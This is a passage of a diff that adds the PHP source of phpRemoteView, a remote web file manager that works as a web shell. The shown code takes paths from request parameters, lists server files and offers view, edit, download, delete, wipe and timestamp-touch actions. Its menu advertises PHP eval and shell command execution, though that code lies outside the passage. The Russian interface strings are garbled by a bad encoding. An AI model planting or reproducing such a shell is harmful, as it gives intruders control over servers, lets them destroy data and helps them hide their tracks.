fullqty"; + foreach (explode(" ",$autovars1) as $k=>$v) { + if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v]; + elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v]; + //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v]; + } + + // + // autofix 'magic quotes': + // + $autovars2="php shell text d root convert"; + if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) { + foreach (explode(" ",$autovars2) as $k=>$v) { + if (isset($$v)) $$v=stripslashes($$v); + } + } + + $cp_def=array( + "001001", + "nst2ac", + "d/m/y H:i", + "Tahoma", + "9" + ); + + $panel=0; + if (isset($HTTP_COOKIE_VARS["cp$panel"])) + $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); + else + $cp=$cp_def; + $cc=$cp[0]; + $cn=$cp[1]; + +/* + +$cc / $cp[0]- ٌïèٌîê îنيîلَêâهييûُ ïàًàىهًٍîâ, ٌêîïèًîâàيî â $cs: + $cc[0] - ïî êàêîé êîëîيêه ٌîًٍèًîâàٍü, à هٌëè ‎ٍî يه ِèôًà: + n - ïî èىهيè + e - ًàٌّèًهيèه + $cc[1] - ïîًےنîê (0 - âîçًàٌٍ. 1 - َلûâà‏ùèé) + $cc[2] - ïîêàçûâàٍü ëè èêîيêè + $cc[3] - ÷ٍî نهëàٍü ïًè êëèêه ïî èêîيêه ôàéëà: + 0 - ïًîٌىîًٍ â text/plain + 1 - ïًîٌىîًٍ â html + 2 - download + 3 - ïàًàىهًٍû ôàéëà (info) + $cc[4] - îêًَمëےٍü ًàçىهً ôàéëîâ نî تل/جل/أل + $cc[5] - ےçûê: + 1 - àيمëèéٌêèé + 2 - ًٌٌَêè + +$cn / $cp[1] - ٌïèٌîê êîëîيîê è èُ ïîًےنîê, êîٍîًûه ïîêàçûâàٍü, ًٌٍîêà لَêâ/ِèôً: + t - type + n - name + s - size + a - owner+group + o - owner + g - group + c - chmod + 1 - create time + 2 - modify time + 3 - access time + +$cp[2]: ôîًىàٍ âًهىهيè + +$cp[3]: èىے ًّèôٍà + +$cp[4]: ًàçىهً ًّèôٍà + +*/ + + // تàê âûًàâيèâàٍü êîëîيêè + $cn_align=array(); + $cn_align['t']='center'; + $cn_align['n']='left'; + $cn_align['s']='right'; + $cn_align['a']='center'; + $cn_align['o']='center'; + $cn_align['g']='center'; + $cn_align['c']='center'; + $cn_align['1']='center'; + $cn_align['2']='center'; + $cn_align['3']='center'; + + +/////////////////////////////////////////////////////////////////////////////// + + +/*--mmstart--*/ +$mm=array( +"Index of"=>"بينهêٌ", +"View file"=>"دîêàç ôàéëà", +"DISK"=>"ؤبرت", +"Info"=>"بيôî", +"Plain"=>"دًےىîé", +"HTML"=>"HTML", +"Session"=>"رهٌٌèے", +"Image"=>"تàًٍèيêà", +"Notepad"=>"ءëîêيîٍ", +"DOWNLOAD"=>"اہأذسابزـ", +"Edit"=>"دًàâêà", +"Sorry, this programm run in read-only mode."=>"بçâèيèٍه, ‎ٍà ïًîمًàىىà ًàلîٍàهٍ â ًهوèىه 'ٍîëüêî ÷ٍهيèه'.", +"For full access: write"=>"ؤëے ïîëيîمî نîٌٍَïà: يàïèّèٍه", +"in this php-file"=>"â ‎ٍîى php-ôàéëه", +"Reason"=>"دًè÷èيà", +"Error path"=>"خّèلî÷يûé ïٍَü", +"Click here for start"=>"حàوىèٍه نëے ٌٍàًٍà", +"up directory"=>"êàٍàëîم âûّه", +"access denied"=>"نîٌٍَï çàïًهùهي", +"REMVIEW TOOLS"=>"سزبثبزغ REMVIEW", +"version"=>"âهًٌèے", +"Free download"=>"ءهٌïëàٍيàے çàمًَçêà", +"back to directory"=>"âهًيٍَüٌے â êàٍàëîم", +"Size"=>"ذàçىهً", +"Owner"=>"خâيهً", +"Group"=>"أًَïïà", +"FileType"=>"زèï ôàéëà", +"Perms"=>"دًàâà", +"Create time"=>"آًهىے ٌîçنàيèے", +"Access time"=>"آًهىے نîٌٍَïà", +"MODIFY time"=>"آًهىے باجإحإحبك", +"HEXDUMP PREVIEW"=>"دذإؤدذخرجخزذ آ 16-ذب×حخج آبؤإ", +"ONLY READ ACCESS"=>"ؤخرزسد زخثـتخ حہ ×زإحبإ", +"Can't READ file - access denied"=>"حه ىîمَ ïًî÷èٍàٍü - نîٌٍَï çàïًهùهي", +"full read/write access"=>"ïîëيûé نîٌٍَï يà ÷ٍهيèه/çàïèٌü", +"FILE SYSTEM COMMANDS"=>"تخجہحؤغ شہةثخآخة ربرزإجغ", +"EDIT"=>"ذإؤہتز.", +"FILE"=>"شہةث", +"DELETE"=>"رزإذإزـ", +"Delete this file"=>"رٍهًهٍü ôàéë", +"CLEAN"=>"خ×برزبزـ", +"TOUCH"=>"خءحخآبزـ", +"Set current 'mtime'"=>"سٌٍàي.ٍهêَù.âًهىے", +"WIPE(delete)"=>"سحب×زخئبزـ", +"Write '0000..' and delete"=>"اàلèٍü يَëےىè, ٌٍهًهٍü", +"COPY FILE"=>"تخدبذخآہزـ شہةث", +"COPY"=>"تخدبذخآہزـ", +"MAKE DIR"=>"رخاؤہزـ تہزہثخأ", +"type full path"=>"ââهنèٍه ïîëيûé ïٍَü", +"MkDir"=>"رîçن.تàٍ.", +"CREATE NEW FILE or override old file"=>"رخاؤہزـ حخآغة شہةث èëè ïهًهçàïèٌàٍü ٌٍàًûé", +"CREATE/OVERRIDE"=>"رخاؤہزـ/دإذإاہدبرہزـ", +"select file on your local computer"=>"âûلًàٍü ôàéë يà âàّهى ëîêàëüيîى êîىïü‏ٍهًه", +"save this file on path"=>"ٌîًُàيèٍü ‎ٍîٍ ôàéë â êàٍàëîم", +"create file name automatic"=>"ïًèنَىàٍü èىے ôàéëَ àâٍîىàٍè÷هٌêè", +"OR"=>"بثب", +"type any file name"=>"ââهٌٍè èىے ôàéëà âًَ÷يَ‏", +"convert file name to lovercase"=>"êîيâهًٍèًîâàٍü èىے â يèويèé ًهمèًٌٍ", +"Send File"=>"دîٌëàٍü ôàéë", +"Delete all files in dir"=>"سنàëèٍü âٌه ôàéëû", +"Delete all dir/files recursive"=>"سنàëèٍü آرإ +ïîنêàٍàëîمè ًهêًٌَèâيî", +"Confirm not found (go back and set checkbox)"=>"دîنٍâهًونهيèه يه ïîٌٍàâëهيî (âهًيèٍهٌü يàçàن è ïîٌٍàâüٍه مàëî÷êَ)", +"Delete cancel - File not found"=>"سنàëهيèه îٍىهيهيî - شàéë يه يàéنهي", +"YES"=>"ؤہ", +"ME"=>"جإحك", +"NO (back)"=>"حإز (يàçàن)", +"Delete cancel"=>"سنàëهيèه îٍىهيهيî", +"ACCESS DENIED"=>"ؤخرزسد اہدذإظإح", +"done (go back)"=>"مîٍîâî (يàçàن)", +"Delete ok"=>"خê, َنàëهييî", +"Touch cancel"=>"خليîâëهيèه îٍىهيهيî", +"Touch ok (set current time to 'modify time')"=>"خليîâëهيèه çàâهًّهيî (ôàéëَ ïًèٌâîهيî ٍهêَùهه âًهىے ىîنèôèêàِèè)", +"Clean (empty file) cancel"=>"خ÷èùهيèه (îليَëهيèه ôàéëà) îٍىهيهيî", +"Clean ok (file now empty)"=>"خê, î÷èùهيî (ôàéë îليَëهي)", +"Wipe cancel - access denied"=>"سيè÷ٍîوهيèه îٍىهيهيî - نîٌٍَï çàïًهùهي", +"Wipe ok (file deleted)"=>"خê, َيè÷ٍîوهيî (è ôàéë ٌٍهًٍ)", +"DIR"=>"DIR", +"Deleting all files in"=>"سنàëهيèه âٌهُ ôàéëîâ â", +"skip"=>"ïًîïٌَê", +"deleting"=>"َنàëهيèه", +"Deleting all dir/files (recursive) in"=>"سنàëهيèه âٌهُ ôàéëîâ/ïîنêàٍàëîمîâ (ًهêًٌَèâيî)", +"DONE, go back"=>"أخزخآخ, يàçàن", +"DONE"=>"أخزخآخ", +"file not found"=>"ôàéë يه يàéنهي", +"ONLY READ ACCESS (don't edit!)"=>"ؤخرزسد زخثـتخ حہ ×زإحبإ (يه ًهنàêٍèًîâàٍü)", +"Can't READ file - access denied (don't edit!)"=>"حه ىîمَ ×بزہزـ ôàéë - نîٌٍَï çàïًهùهي", +"EDIT FILE"=>"دذہآبزـ شہةث", +"can't open, access denied"=>"يه ىîمَ îٍêًûٍü, نîٌٍَï çàïًهùهي", +"SAVE FILE (write to disk)"=>"رخصذہحبزـ شہةث (çàïèٌü يà نèٌê)", +"You mast checked 'create file name automatic' OR typed file name!"=>"آû نîëويû îٍىهٍèٍü مàëî÷êَ [ٌîçنàٍü ôàéë àâٍîىàٍè÷هٌêè] èëè ââهٌٍè â ïîëه èىے ôàéëà!'", +"SAVING TO"=>"رخصذہحبزـ آ", +"Sorry, access denied"=>"بçâèيèٍه, نîٌٍَï çàïًهùهي", +"for example, uncomment next line"=>"نëے ïًèىهًà, ًàٌêîىىهيٍèًَéٍه ٌëهنَ‏ùَ‏ ًٌٍîêَ", +"Eval PHP code"=>"آûïîëيèٍü PHP êîن", +"don't type"=>"يه ïèّèٍه", +"and"=>"è", +"example (remove comments '#')"=>"ïًèىهً (َنàëèٍه êîىىهيٍàًèè '#')", +"Shell commands"=>"تîىàينû Shell'a", +"filesize to 0byte"=>"ًàçىهً â 0 لàéٍ", +"from"=>"îٍ", +"to"=>"â", +"Full file name"=>"دîëيîه èىے ôàéëà", +"Can't open directory"=>"حه ىîمَ îٍêًûٍü êàٍàëîم", +"setup"=>"يàًٌٍîéêà", +"back"=>"يàçàن", +"Reset all settings"=>"رلًîٌèٍü âٌه يàًٌٍîéêè", +"clear"=>"î÷èٌٍèٍü", +"Current"=>"زهêَùèه", +"Colums and sort"=>"تîëîيêè è ٌîًٍèًîâêà", +"Sort order"=>"دîًےنîê ٌîًٍèًîâêè", +"Ascending sort"=>"دî âîçًàٌٍàيè‏", +"Descending sort"=>"دî َلûâàيè‏", +"Sort by filename"=>"رîًٍèًîâàٍü ïî èىهيè ôàéëà", +"Sort by filename extension"=>"رîًٍèًîâàٍü ïî ًàٌّèًهيè‏ ôàéëà", +"Date/time format"=>"شîًىàٍ نàٍû/âًهىهيè", +"Panel font & size"=>"طًèôٍ/ًàçىهً ïàيهëè", +"Setup"=>"خïِèè", +"Char map"=>"رèىâîëû", +"Language"=>"كçûê", +"English"=>"ہيمëèéٌêèé", +"Russian"=>"ذٌٌَêèé", +"Character map (symbol codes table)"=>"زàلëèِà ٌèىâîëîâ", +"Select font"=>"آûلهًèٍه ًّèôٍ", +"or type other"=>"èëè ââهنèٍه نًَمîé", +"Font size"=>"ذàçىهً ًّèôٍà", +"Code limit"=>"ؤèïàçîي êîنîâ", +"Generate table"=>"رمهيهًèًîâàٍü ٍàلëèَِ", +"Universal convert"=>"سيèâهًٌàëüيûه êîيâهًٍàِèè" +);/*--mmstop--*/ + + + + + $language=$cc[5]; + if ($language!=1 && $language!=2) $language=1; + + +function mm($m) { + global $mm,$language; + if ($language==1) return $m; + if (isset($mm[$m])) return $mm[$m]; + else echo "<script>alert('(mm) msg not found: $m');</script>"; +} + + +switch ($language) { +case 1: +$cn_name=array( +'t'=>"Type", +'n'=>"Name", +'s'=>"Size", +'o'=>"Owner", +'g'=>"Group", +'a'=>"Owner/Group", +'c'=>"Perms", +'1'=>"Create", +'2'=>"Modify", +'3'=>"Access" +); +break; +case 2: +$cn_name=array( +'t'=>"زèï", +'n'=>"بىے", +'s'=>"ذàçىهً", +'o'=>"آëàنهëهِ", +'g'=>"أًَïïà", +'a'=>"آëàنهëهِ/أًَïïà", +'c'=>"دًàâà", +'1'=>"رîçنàي", +'2'=>"بçىهيهي", +'3'=>"ؤîٌٍَï" +); +break; +} + + + + +/////////////////////////////////////////////////////////////////////////////// + + + + $rand=microtime(); + + if (!isset($c)) $c=""; + if (!isset($d)) $d=""; + if (!isset($f)) $f=""; + + ob(); + $d=str_replace("\\","/",$d); + if ($d=="") $d=realpath("./")."/"; + if ($c=="") $c="l"; + if ($d[strlen($d)-1]!="/") $d.="/"; + $d=str_replace("\\","/",$d); + if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb"); + if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb"); + obb(); + + // + // OS detect: + // + $win=0; + $unix=0; + if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1; + + + + +/////////////////////////////////////////////////////////////////////////////// + + +$html=<<<remview +<html><head> +<title>phpRemoteView: $d$f</title> +</head> +<body> +<style> +A { +text-decoration : none; +} +.t { +font-size: 9pt; +text-align : center; +font-family: Verdana; +} +.t2 { +font-size: 8pt; +text-align : center; +font-family: Verdana; +} +.n { + font-family: Fixedsys +} +.s { +font-size: 10pt; +text-align : right; +font-family: Verdana; +} +.sy { +font-family: Fixedsys; +} +.s2 { +font-family: Fixedsys; +color: red; +} +.tab { +font-size: 10pt; +text-align : center; +font-family: Verdana; +background: #cccccc; +} +.tr { +background: #ffffff; +} +</style> +remview; + + + +function display_perms($mode) +{ +if ($GLOBALS['win']) return 0; +/* Determine Type */ +if( $mode & 0x1000 ) +$type='p'; /* FIFO pipe */ +else if( $mode & 0x2000 ) +$type='c'; /* Character special */ +else if( $mode & 0x4000 ) +$type='d'; /* Directory */ +else if( $mode & 0x6000 ) +$type='b'; /* Block special */ +else if( $mode & 0x8000 ) +$type='-'; /* Regular */ +else if( $mode & 0xA000 ) +$type='l'; /* Symbolic Link */ +else if( $mode & 0xC000 ) +$type='s'; /* Socket */ +else +$type='u'; /* UNKNOWN */ + +/* Determine permissions */ +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; + +/* Adjust for SUID, SGID and sticky bit */ +if( $mode & 0x800 ) +$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) +$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) +$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; + +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} + +function _posix_getpwuid($x) { + if ($GLOBALS['win']) return array(); + return @posix_getpwuid($x); +} + +function _posix_getgrgid($x) { + if ($GLOBALS['win']) return array(); + return @posix_getgrgid($x); +} + +function up($d,$f="",$name="") { + global $self,$win; + + $len=strlen($d."/".$f); + if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; } + elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";} + else {$sf1="<font size=2>"; $sf2="<font size=3>";} + + echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td + bgcolor=#cccccc> $sf1"; + + $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>"; + echo $home.$sf2."<b>"; + if ($name!="") echo $name; + else { + if ($f=="") echo mm("Index of"); + else echo mm("View file"); + } + echo "</b></font> "; + + $path=explode("/",$d); + + $rootdir="/"; + if ($win) $rootdir=strtoupper(substr($d,0,2))."/"; + + $ss=""; + for ($i=0; $i<count($path)-1; $i++) { + if ($i==0) + $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; + else + $comm="$path[$i]<big><b>/</big></b>"; + + $ss.=$path[$i]."/"; + echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>"; + if ($i==0 && $d=="/") break; + } + echo "</font>"; + if ($f!="") echo "$sf1$f</font>"; + + if ($win && strlen($d)<4 && $f=="") { + echo " &nbsp; ".mm("DISK").": "; + for ($i=ord('a'); $i<=ord('z'); $i++) { + echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> "; + } + } + + echo "</b></big></td><td bgcolor=#999999 width=1% align=center> + <table width=100% border=0 cellspacing=3 cellpadding=0 + bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a + href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b> + </nobr></font></td></tr></table> + </td></tr></table>"; +} + + +function up_link($d,$f) { + global $self; + $notepad=str_replace(".","_",$f).".txt"; +echo "<small> +[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>] +[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>] +[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>] +[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>] +[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>] +[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>] +[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>] +[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>] +</small>"; +} + + +function exitw() { +exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd> +<tr><td align=center> +".mm("Sorry, this programm run in read-only mode.")."<br> +".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` +".mm("in this php-file").".</td></tr></table> +"); +} + + + +function ob() { + global $obb_flag, $obb; + if (!isset($obb_flag)) { $obb_flag=0; $obb=false; } + if (function_exists("ob_start")) { + if ($GLOBALS['obb_flag']) ob_end_clean(); + ob_start(); + $GLOBALS['obb_flag']=1; + } +} + +function obb() { + global $obb; + if (function_exists("ob_start")) { + $obb=ob_get_contents(); + ob_end_clean(); + $obb="<P> +<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td> +<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center> +<b>".mm("Reason").":</b></td></tr></table> +</td></tr><tr><td> +<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td> +$obb<P> +</td></tr></table> +</table><P>"; + $GLOBALS['obb_flag']=0; + } +} + +function sizeparse($size) { + return strrev(preg_replace("!...!","\\0 ",strrev($size))); +} + + +function jsval($msg) { + $msg=str_replace("\\","\\\\",$msg); + $msg=str_replace("\"","\\\"",$msg); + $msg=str_replace("'","\\'",$msg); + return '"'.$msg.'",'; +} + + + +/////////////////////////////////////////////////////////////////////////// + + +switch($c) { + + +// listing +case "l": + + echo $GLOBALS['html']; + + if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>."); + + //up($d); + + ob(); + $di=dir($d); + obb(); + + $dirs=array(); + $files=array(); + + if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")). + "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>". + "<font color=red><b>".mm("access denied")."</b></font>: $obb"); + while (false!==($name=$di->read())) { + if ($name=="." || $name=="..") continue; + if (@is_dir($d.$name)) { + $dirs[]=strval($name); + $fstatus[$name]=0; + } + else { + $files[]=strval($name); + $fstatus[$name]=1; + } + $fsize[$name]=@filesize($d.$name); + $ftype[$name]=@filetype($d.$name); + if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; } + $fperms[$name]=@fileperms($d.$name); + $fmtime[$name]=@filemtime($d.$name); + $fatime[$name]=@fileatime($d.$name); + $fctime[$name]=@filectime($d.$name); + $fowner[$name]=@fileowner($d.$name); + $fgroup[$name]=@filegroup($d.$name); + if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) + $fext[$name]=strtolower($ok[1]); + else + $fext[$name]=""; + } + $di->close(); + + $listsort=array(); + if (count($dirs)) + foreach ($dirs as $v) { + switch ($cc[0]) { + case "e": $listsort[$v]=$fext[$v].' '.$v; break; + case "n": $listsort[$v]=strtolower($v); break; + default: + switch ($cn[$cc[0]]) { + case "t": case "s": case "n": $listsort[$v]=strtolower($v); break; + case "o": $listsort[$v]=$fowner[$v]; break; + case "g": $listsort[$v]=$fgroup[$v]; break; + case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break; + case "c": $listsort[$v]=$fperms[$v]; break; + case "1": $listsort[$v]=$fctime[$v]; break; + case "2": $listsort[$v]=$fmtime[$v]; break; + case "3": $listsort[$v]=$fatime[$v]; break; + + } + } + } + + $names=$listsort; + //echo "<pre>";print_r($names); + if ($cc[1]) arsort($names); else asort($names); + //echo "<pre>";print_r($names); + + $listsort=array(); + if (count($files)) + foreach ($files as $v) { + $v=strval($v); + switch ($cc[0]) { + case "e": $listsort[$v]=$fext[$v].' '.$v; break; + case "n": $listsort[$v]=strtolower($v); break; + default: + switch ($cn[$cc[0]]) { + case "n": $listsort[$v]=strtolower($v); break; + case "t": $listsort[$v]=$ftype[$v]; break; + case "s": $listsort[$v]=$fsize[$v]; break; + case "o": $listsort[$v]=$fowner[$v]; break; + case "g": $listsort[$v]=$fgroup[$v]; break; + case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break; + case "c": $listsort[$v]=$fperms[$v]; break; + case "1": $listsort[$v]=$fctime[$v]; break; + case "2": $listsort[$v]=$fmtime[$v]; break; + case "3": $listsort[$v]=$fatime[$v]; break; + + } + } + } + + + //echo "<pre>DIRS:"; print_r($names); + if ($cc[1]) arsort($listsort); else asort($listsort); + //$names=array_merge($names,$listsort); + foreach ($listsort as $k=>$v) $names[$k]=$v; + //echo "<pre>FILES:"; print_r($listsort); + //echo "<pre>NAMES:"; print_r($names); + +?> +<STYLE> +.title { +color: 'black'; +background: #D4D0C8; +text-align: 'center'; +BORDER-RIGHT: #888888 1px outset; +BORDER-TOP: #ffffff 2px outset; +BORDER-LEFT: #ffffff 1px outset; +BORDER-BOTTOM: #888888 1px outset; +} +.window { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; +BACKGROUND-COLOR: #D4D0C8; +CURSOR: default; +} +.window1 { +BORDER-RIGHT: #eeeeee 1px solid; +BORDER-TOP: #808080 1px solid; +BORDER-LEFT: #808080 1px solid; +BORDER-BOTTOM: #eeeeee 1px solid; +FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; +} +.line { +BORDER-RIGHT: #cccccc 1px solid; +BORDER-TOP: #ffffff 1px solid; +BORDER-LEFT: #ffffff 1px solid; +BORDER-BOTTOM: #cccccc 1px solid; +font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>; +} +.line2 { +background: #ffffcc; +} +.black {color: black} +a:link.black {color: black} +a:active.black {color: black} +a:visited.black {color: black} +a:hover.black {color: #0000ff} + +.white {color: white} +a:link.white{color: white} +a:active.white{color: white} +a:visited.white{color: white} +a:hover.white{color: #ffff77} + +a:link {color: #000099;} +a:active {color: #000099;} +a:visited {color: #990099;} +a:hover {color: #ff0000;} +a { +CURSOR: default; +} +.windowtitle { +font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; +font-weight: bold; +color: white; +} +.sym { +font: 14px Wingdings; +} +</STYLE> + +<?php + +function up2($d) { + global $win,$self; + $d=str_replace("\\","/",$d); + if (substr($d,-1)!="/") $d.="/"; + $d=str_replace("//","/",$d); + + $n=explode("/",$d); + unset($n[count($n)-1]); + + $path=""; + for ($i=0; $i<count($n); $i++) { + $path="$path$n[$i]/"; + if ($i==0) $path=strtoupper($path); + $paths[]=$path; + } + + $out=""; + $sum=0; + $gr=70; + for ($i=0; $i<count($n); $i++) { + $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>"; + if (strlen($d)>$gr && $i>0 && $i+1<count($n)) { + if (strlen($d)-$sum>$gr) { + $out.="••"; + $sum+=strlen($n[$i]); + } + else + $out.=$n[$i]; + } + else + if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i]; + $out.="/</a>"; + + } + + return $out; + return "<font size=-2>$d</font>"; +} + +$ext=array(); +$ext['html']=array('html','htm','shtml'); +$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg'); +$ext['exe']=array('exe','com','pif','src','lnk'); +$ext['php']=array('php','phtml','php3','php4','inc'); +$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg'); + + + echo "\n\n\n<script>\nfunction tr("; + for ($i=0; $i<strlen($cn); $i++) { + echo "a$i,"; + } + echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee"; +// echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>"; + echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>"; + for ($i=0; $i<strlen($cn); $i++) { + echo '<td align='.$cn_align[$cn[$i]].' class=line '; + switch ($cn[$i]) { + case 's': case 'c': case '1': case '2': case '3': case 't': + echo ' nowrap'; + } + echo ">"; + if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0"; + echo "\"+a$i+\""; + if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0"; + echo "</td>"; + } + echo "</tr>\");\n}"; + echo "\n\n</script>\n\n\n"; + + + //phpinfo(); + //echo implode(" | ",$cp); + echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc + class=window align=center width=60%><form name=main>'; + + echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'. + $self.'?c=img&name=fon&r=" class=windowtitle>'; + + echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'. + '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'. + up2($d.$f).'</td></tr></table>'; + + echo '</td></tr>'. + '<tr><td>'. + '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>'; + + $button_help=array( + 'up'=>"UP DIR", + 'refresh'=>"RELOAD", + 'mode'=>'SETUP, folder option', + 'edit'=>'DIR INFO', + 'home'=>'HomePage', + 'papki'=>'TREE', + 'setup'=>'PHP eval, Shell', + 'back'=>'BACK', + ); + + function button_url($name) { + global $self,$d,$f,$uurl; + switch ($name) { + case 'up': return "$self?c=l&d=".urlencode(realpath($d."..")); + case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d); + case 'mode': return "$self?c=setup&ref=$uurl"; + case 'edit': return "$self?c=d&d=".urlencode($d); + case 'home': return "http://php.spb.ru/remview/"; + case 'papki': return "$self?c=tree&d=".urlencode($d); + case 'setup': return "$self?c=t"; + case 'back': return "javascript:history.back(-1)"; + } + } + echo '<td colspan='.strlen($cn).'> + <table border=0 cellspacing=0 cellpadding=2><tr>'; + $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home'); + $tmp=strtoupper($d[0]); + for ($i=0; $i<count($buttons); $i++) { + if ($buttons[$i]=='full') { + echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" + style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>'; + continue; + } + if ($buttons[$i]=='disk') { + if (!$win) continue; + echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '. + ' onMouseOut="this.style.backgroundColor=\'\'">'; + echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 ' + onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>"; + for ($j=ord('A'); $j<=ord('Z'); $j++) + echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j); + echo "</select></td>"; + continue; + } + $bturl=button_url($buttons[$i]); + echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'. + ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'. + ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'. + ' onClick=\'location.href="'.$bturl.'"\'><a href='; + echo button_url($buttons[$i]); + echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>'; + } + echo '</tr></table> + </td></tr><tr>'; + + + for ($i=0; $i<strlen($cn); $i++) { + echo "<td nowrap class=title onClick='location.href=\"". + "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'"; + switch ($cn[$i]) { + case 1: case 2: case 3: case "s": echo " width=13%"; break; + case 't': echo " width=2%"; break; + case 'n': echo " width=40%"; break; + } + echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>"; + switch ($cn[$i]) { + case 